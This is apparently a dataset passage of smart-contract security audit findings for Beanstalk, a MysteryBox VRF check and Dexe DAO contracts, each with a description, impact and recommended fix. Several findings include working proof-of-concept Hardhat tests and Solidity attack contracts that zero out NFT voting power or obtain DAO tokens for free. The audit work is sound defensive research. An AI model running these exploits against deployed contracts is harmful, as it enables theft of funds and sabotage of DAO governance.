`removedBDV` for partial withdrawals.\\nThe breaking of protocol invariants could lead to other serious issues that have not yet been identified but may well exist if core properties do not hold. We would urge the team to consider fixing this bug as soon as possible, prior to or as part of the BIP-39 upgrade.чAn attacker can withdraw deposited assets without decreasing BDV and Stalk. 
While the cost to perform this attack is likely more than the value an attacker would stand to gain, the potential impact should definitely be explored more closely especially considering the introduction of the Unripe Chop Convert in BIP-39 as this could have other unintended consequences in relation to this bug (given that the inflated BDV of an Unripe Token will persist once deposit is converted to its ripe counterpart, potentially allowing value to be extracted that way depending on how this BDV is used/manipulated elsewhere).\\nThe other primary consideration for this bug is that it breaks the mechanism that Stalk is supposed to be lost when withdrawing deposited assets and keeps the `totalDepositedBdv` artificially high, violating the invariant that the `totalDepositedBdv` value for a token should be the sum of the BDV value of all the individual deposits.\\nProof of Concept: Add this PoC to `SiloToken.test.js` under the section describe(\"1 deposit, some\", async function () {:\\n```\\nit('audit small unripe bean withdrawals dont decrease BDV and Stalks', async function () {\\n let initialUnripeBeanDeposited = to6('10');\\n let initialUnripeBeanDepositedBdv = '2355646';\\n let initialTotalStalk = pruneToStalk(initialUnripeBeanDeposited).add(toStalk('0.5'));\\n\\n // verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // snapshot EVM state as we want to restore it after testing the normal\\n // case works as expected\\n let snapshotId = await network.provider.send('evm_snapshot');\\n\\n // normal case: withdrawing total UNRIPE_BEAN correctly decreases BDV & removes stalks\\n const stem = await this.silo.seasonToStem(UNRIPE_BEAN, '10');\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, initialUnripeBeanDeposited, 
EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited == 0\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq('0');\\n // verify UNRIPE_BEAN totalDepositedBDV == 0\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq('0');\\n // verify silo.totalStalk() == 0\\n expect(await this.silo.totalStalk()).to.eq('0');\\n\\n // restore EVM state to snapshot prior to testing normal case\\n await network.provider.send(\"evm_revert\", [snapshotId]);\\n\\n // re-verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // attacker case: withdrawing small amounts of UNRIPE_BEAN doesn't decrease\\n // BDV and doesn't remove stalks. This lets an attacker withdraw their deposits\\n // without losing Stalks & breaks the invariant that the totalDepositedBDV should\\n // equal the sum of the BDV of all individual deposits\\n let smallWithdrawAmount = '4';\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, smallWithdrawAmount, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited has been correctly decreased\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited.sub(smallWithdrawAmount));\\n // verify UNRIPE_BEAN totalDepositedBDV remains unchanged!\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n // verify silo.totalStalk() remains unchanged!\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n});\\n```\\n\\nRun with: `npx hardhat test --grep \"audit small unripe bean withdrawals dont decrease BDV and Stalks\"`.\\nAdditional Mainnet fork tests have been written to demonstrate the presence of this bug in the current and post-BIP-39 deployments of Beanstalk (see Appendix B).ч```\\n// @audit small unripe bean 
withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n -Broken check in `MysteryBox::fulfillRandomWords()` fails to prevent same request being fulfilled multiple timesчhighчConsider the check which attempts to prevent the same request from being fulfilled multiple times:\\n```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n\\nThe problem is that `vrfRequests[_requestId].fulfilled` is never set to `true` anywhere and `vrfRequests[_requestId]` is deleted at the end of the function.чSet `vrfRequests[_requestId].fulfilled = true`.\\nConsider an optimized version which involves having 2 mappings `activeVrfRequests` and fulfilledVrfRequests:\\nrevert `if(fulfilledVrfRequests[_requestId])`\\nelse set `fulfilledVrfRequests[_requestId] = true`\\nfetch the matching active request into memory from `activeVrfRequests[_requestId]` and continue processing as normal\\nat the end `delete activeVrfRequests[_requestId]`\\nThis only stores forever the `requestId` : `bool` pair in `fulfilledVrfRequests`.\\nConsider a similar approach in `MysteryBox::fulfillBoxAmount()`.чThe same request can be fulfilled multiple times which would override the previous randomly generated seed; a malicious provider who was also a mystery box minter could generate new randomness until they got a rare mystery box.ч```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n -Use low level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. 
For example:\\n```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}(\"\");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = address(operatorAddress).call{value: msg.value}(\"\");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.чContracts unnecessarily expose themselves to gas griefing attacks.ч```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}(\"\");\\nif (!sent) revert Unauthorized();\\n```\\n -`TokenSaleProposal::buy` implicitly assumes that buy token has 18 decimals resulting in a potential total loss scenario for Dao Poolчhighч`TokenSaleProposalBuy::buy` is called by users looking to buy the DAO token using a pre-approved token. The exchange rate for this sale is pre-assigned for the specific tier. This function internally calls `TokenSaleProposalBuy::_purchaseWithCommission` to transfer funds from the buyer to the gov pool. Part of the transferred funds are used to pay the DexeDAO commission and balance funds are transferred to the `GovPool` address. 
To do this, `TokenSaleProposalBuy::_sendFunds` is called.\\n```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}(\"\");\\n require(success, \"TSP: failed to transfer ether\");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n\\nNote that this function assumes that the `amount` of ERC20 token is always 18 decimals. The `DecimalsConverter::from18` function converts from a base decimal (18) to token decimals. Note that the `amount` is directly passed by the buyer and there is no prior normalisation done to ensure the token decimals are converted to 18 decimals before the `_sendFunds` is called.чThere are at least 2 options for mitigating this issue:\\nOption 1 - revise the design decision that all token amounts must be sent in 18 decimals even if the underlying token decimals are not 18, to instead that all token amounts should be sent in their native decimals and Dexe will convert everything.\\nOption 2 - keep current design but revert if `amount.from18(token.decimals()) == 0` in L90 or alternatively use the `from18Safe()` function which uses `_convertSafe()` that reverts if the conversion is 0.\\nThe project team should also examine other areas where the same pattern occurs which may have the same vulnerability and where it may be required to revert if the conversion returns 0:\\n`GovUserKeeper` L92, L116, L183\\n`GovPool` L248\\n`TokenSaleProposalWhitelist` L50\\n`ERC721Power` L113, L139\\n`TokenBalance` L35, L62чIt is easy to see that for tokens with smaller decimals, eg. USDC with 6 decimals, will cause a total loss to the DAO. 
In such cases amount is presumed to be 18 decimals & on converting to token decimals(6), this number can round down to 0.\\nProof of Concept:\\nTier 1 allows users to buy DAO token at exchange rate, 1 DAO token = 1 USDC.\\nUser intends to buy 1000 Dao Tokens and calls `TokenSaleProposal::buy` with `buy(1, USDC, 1000*10**6)\\nDexe DAO Comission is assumed 0% for simplicity- > `sendFunds` is called with `sendFunds(USDC, govPool, 1000* 10**6)`\\n`DecimalConverter::from18` function is called on amount with base decimals 18, destination decimals 6: `from18(1000*10**6, 18, 6)`\\nthis gives `1000*10**6/10*(18-6) = 1000/ 10**6` which rounds to 0\\nBuyer can claim 1000 DAO tokens for free. This is a total loss to the DAO.\\nAdd PoC to TokenSaleProposal.test.js:\\nFirst add a new line around L76 to add new purchaseToken3:\\n```\\n let purchaseToken3;\\n```\\n\\nThen add a new line around L528:\\n```\\n purchaseToken3 = await ERC20Mock.new(\"PurchaseMockedToken3\", \"PMT3\", 6);\\n```\\n\\nThen add a new tier around L712:\\n```\\n {\\n metadata: {\\n name: \"tier 9\",\\n description: \"the ninth tier\",\\n },\\n totalTokenProvided: wei(1000),\\n saleStartTime: timeNow.toString(),\\n saleEndTime: (timeNow + 10000).toString(),\\n claimLockDuration: \"0\",\\n saleTokenAddress: saleToken.address,\\n purchaseTokenAddresses: [purchaseToken3.address],\\n exchangeRates: [PRECISION.times(1).toFixed()],\\n minAllocationPerUser: 0,\\n maxAllocationPerUser: 0,\\n vestingSettings: {\\n vestingPercentage: \"0\",\\n vestingDuration: \"0\",\\n cliffPeriod: \"0\",\\n unlockStep: \"0\",\\n },\\n participationDetails: [],\\n },\\n```\\n\\nThen add the test itself under the section describe(\"if added to whitelist\", () => {:\\n```\\n it(\"audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO\", async () => {\\n await purchaseToken3.approve(tsp.address, wei(1000));\\n\\n // tier9 has the following parameters:\\n // totalTokenProvided : wei(1000)\\n // 
minAllocationPerUser : 0 (no min)\\n // maxAllocationPerUser : 0 (no max)\\n // exchangeRate : 1 sale token for every 1 purchaseToken\\n //\\n // purchaseToken3 has 6 decimal places\\n //\\n // mint purchase tokens to owner 1000 in 6 decimal places\\n // 1000 000000\\n let buyerInitTokens6Dec = 1000000000;\\n\\n await purchaseToken3.mint(OWNER, buyerInitTokens6Dec);\\n await purchaseToken3.approve(tsp.address, buyerInitTokens6Dec, { from: OWNER });\\n\\n //\\n // start: buyer has bought no tokens\\n let TIER9 = 9;\\n let purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, wei(0));\\n\\n // buyer attempts to purchase using 100 purchaseToken3 tokens\\n // purchaseToken3 has 6 decimals but all inputs to Dexe should be in\\n // 18 decimals, so buyer formats input amount to 18 decimals\\n // doing this first to verify it works correctly\\n let buyInput18Dec = wei(\"100\");\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput18Dec);\\n\\n // buyer has bought wei(100) sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, buyInput18Dec);\\n\\n // buyer has 900 000000 remaining purchaseToken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), \"900000000\");\\n\\n // next buyer attempts to purchase using 100 purchaseToken3 tokens\\n // but sends input formatted into native 6 decimals\\n // sends 6 decimal input: 100 000000\\n let buyInput6Dec = 100000000;\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput6Dec);\\n\\n // buyer has bought an additional 100000000 sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, \"100000000000100000000\");\\n\\n // but the buyer still has 900 000000 remaining purchasetoken3 tokens\\n assert.equal((await 
purchaseToken3.balanceOf(OWNER)).toFixed(), \"900000000\");\\n\\n // by sending the input amount formatted to 6 decimal places,\\n // the buyer was able to buy small amounts of the token being sold\\n // for free!\\n });\\n```\\n\\nFinally run the test with: `npx hardhat test --grep \"audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO\"`ч```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}(\"\");\\n require(success, \"TSP: failed to transfer ether\");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n -Attacker can destroy user voting power by setting `ERC721Power::totalPower` and all existing NFTs `currentPower` to 0чhighчAttacker can destroy user voting power by setting `ERC721Power::totalPower` & all existing nfts' `currentPower` to 0 via a permission-less attack contract by exploiting a discrepancy (\"<\" vs \"<=\") in `ERC721Power` L144 & L172:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? 
nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n\\nThis attack has to be run on the exact block that power calculation starts (when block.timestamp == ERC721Power.powerCalcStartTimestamp).чResolve the discrepancy between `ERC721Power` L144 & L172.ч`ERC721Power::totalPower` & all existing nft's `currentPower` are set 0, negating voting using `ERC721Power` since `totalPower` is read when creating the snapshot and `GovUserKeeper::getNftsPowerInTokensBySnapshot()` will return 0 same as if the nft contract didn't exist. Can also negatively affect the ability to create proposals.\\nThis attack is extremely devastating as the individual power of `ERC721Power` nfts can never be increased; it can only decrease over time if the required collateral is not deposited. 
By setting all nfts' `currentPower = 0` as soon as power calculation starts (block.timestamp == ERC721Power.powerCalcStartTimestamp) the `ERC721Power` contract is effectively completely bricked - there is no way to \"undo\" this attack unless the nft contract is replaced with a new contract.\\nDexe-DAO can be created using only nfts for voting; in this case this exploit which completely bricks the voting power of all nfts means a new DAO has to be re-deployed since no one can vote as everyone's voting power has been destroyed.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport \"../../gov/ERC721/ERC721Power.sol\";\\n\\nimport \"hardhat/console.sol\";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower by the the true max power of all\\n // the power nfts that exist (to zero), regardless of who owns them, and sets the current\\n // power of all nfts to zero, totally bricking the ERC721Power contract.\\n //\\n // this attack only works when block.timestamp == nftPower.powerCalcStartTimestamp\\n // as it takes advantage of a difference in getNftPower() & recalculateNftPower():\\n //\\n // getNftPower() returns 0 when block.timestamp <= powerCalcStartTimestamp\\n // recalculateNftPower returns 0 when block.timestamp < powerCalcStartTimestamp\\n function attack(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp == nftPower.powerCalcStartTimestamp(),\\n \"ERC721PowerAttack: attack requires block.timestamp == nftPower.powerCalcStartTimestamp\"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n \"ERC721PowerAttack: incorrect initial totalPower\"\\n );\\n\\n // call recalculateNftPower() for 
every nft, this:\\n // 1) decreases ERC721Power::totalPower by that nft's max power\\n // 2) sets that nft's currentPower = 0\\n for (uint256 i = 1; i <= lastTokenId; ) {\\n require(\\n nftPower.recalculateNftPower(i) == 0,\\n \"ERC721PowerAttack: recalculateNftPower() should return 0 for new nft power\"\\n );\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n require(\\n nftPower.totalPower() == 0,\\n \"ERC721PowerAttack: after attack finished totalPower should equal 0\"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(\"audit attacker can manipulate ERC721Power totalPower\", () => {\\n it(\"audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0\", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(\"100\");\\n let requiredCollateral = wei(\"100\");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n // hack needed to start attack contract on exact block due to hardhat\\n // advancing block.timestamp in the background between function calls\\n let powerCalcStartTime2 = (await getCurrentBlockTime()) + 999;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(\"10\"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(\"0\").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(\"ERC721PowerAttack\");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await 
nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to the start of power calculation\\n await setTime(powerCalcStartTime2);\\n\\n // launch the attack\\n await attackContract.attack(nft.address, maxPowerPerNft.times(10).toFixed(), 10);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep \"audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0\"`ч```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n -A malicious DAO Pool can create a token sale tier without actually transferring any DAO tokensчhighч`TokenSaleProposalCreate::createTier` is called by a DAO Pool owner to create a new token sale tier. 
A fundamental prerequisite for creating a tier is that the DAO Pool owner must transfer the `totalTokenProvided` amount of DAO tokens to the `TokenSaleProposal`.\\nCurrent implementation implements a low-level call to transfer tokens from `msg.sender(GovPool)` to `TokenSaleProposal` contract. However, the implementation fails to validate the token balances after the transfer is successful. We notice a `dev` comment stating \"return value is not checked intentionally\" - even so, this vulnerability is not related to checking return `status` but to verifying the contract balances before & after the call.\\n```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n\\nSince a DAO Pool owner can use any ERC20 as a DAO token, it is possible for a malicious Gov Pool owner to implement a custom ERC20 implementation of a token that overrides the `transferFrom` function. This function can override the standard ERC20 `transferFrom` logic that fakes a successful transfer without actually transferring underlying tokens.чCalculate the contract balance before and after the low-level call and verify if the account balance increases by `totalTokenProvided`. Please be mindful that this check is only valid for non-fee-on-transfer tokens. For fee-on-transfer tokens, the balance increase needs to be further adjusted for the transfer fees. 
Example code for non-fee-on-transfer tokens:\\n```\\n // transfer sale tokens to TokenSaleProposal and validate the transfer\\n IERC20 saleToken = IERC20(_tierInitParams.saleTokenAddress);\\n\\n // record balance before transfer in 18 decimals\\n uint256 balanceBefore18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // perform the transfer\\n saleToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _tierInitParams.totalTokenProvided.from18Safe(_tierInitParams.saleTokenAddress)\\n );\\n\\n // record balance after the transfer in 18 decimals\\n uint256 balanceAfter18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // verify that the transfer has actually occurred to protect users from malicious\\n // sale tokens that don't actually send the tokens for the token sale\\n require(balanceAfter18 - balanceBefore18 == _tierInitParams.totalTokenProvided,\\n "TSP: token sale proposal creation received incorrect amount of tokens"\\n );\\n```\\nчA fake tier can be created without the proportionate amount of DAO Pool token balance in the `TokenSaleProposal` contract. Naive users can participate in such a token sale assuming their DAO token claims will be honoured at a future date. 
Since the pool has insufficient token balance, any attempts to claim the DAO pool tokens can lead to a permanent DOS.ч```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n -Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0чhighчAttacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0 using a permission-less attack contract by taking advantage of being able to call `ERC721Power::recalculateNftPower()` & `getNftPower()` for non-existent nfts:\\n```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. 
Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\nч`ERC721Power::recalculateNftPower()` should revert when called for non-existent nfts.ч`ERC721Power::totalPower` lowered to near 0. 
This can be used to artificially increase voting power since `totalPower` is read when creating the snapshot and is used as the divisor in `GovUserKeeper::getNftsPowerInTokensBySnapshot()`.\\nThis attack is pretty devastating as `ERC721Power::totalPower` can never be increased since the `currentPower` of individual nfts can only ever be decreased; there is no way to \"undo\" this attack unless the nft contract is replaced with a new contract.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport \"../../gov/ERC721/ERC721Power.sol\";\\n\\nimport \"hardhat/console.sol\";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower close to 0\\n //\\n // this attack works when block.timestamp > nftPower.powerCalcStartTimestamp\\n // by taking advantage calling recalculateNftPower for non-existent nfts\\n function attack2(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId,\\n uint256 attackIterations\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp > nftPower.powerCalcStartTimestamp(),\\n \"ERC721PowerAttack: attack2 requires block.timestamp > nftPower.powerCalcStartTimestamp\"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n \"ERC721PowerAttack: incorrect initial totalPower\"\\n );\\n\\n // output totalPower before attack\\n console.log(nftPower.totalPower());\\n\\n // keep calling recalculateNftPower() for non-existent nfts\\n // this lowers ERC721Power::totalPower() every time\\n // can't get it to 0 due to underflow but can get close enough\\n for (uint256 i; i < attackIterations; ) {\\n nftPower.recalculateNftPower(++lastTokenId);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // output totalPower after attack\\n 
console.log(nftPower.totalPower());\\n\\n // original totalPower : 10000000000000000000000000000\\n // current totalPower : 900000000000000000000000000\\n require(\\n nftPower.totalPower() == 900000000000000000000000000,\\n \"ERC721PowerAttack: after attack finished totalPower should equal 900000000000000000000000000\"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(\"audit attacker can manipulate ERC721Power totalPower\", () => {\\n it(\"audit attack 2 dramatically lowers ERC721Power totalPower\", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(\"100\");\\n let requiredCollateral = wei(\"100\");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(\"10\"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(\"0\").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(\"ERC721PowerAttack\");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to just after the start of power calculation\\n await setTime(powerCalcStartTime);\\n\\n // launch the attack\\n 
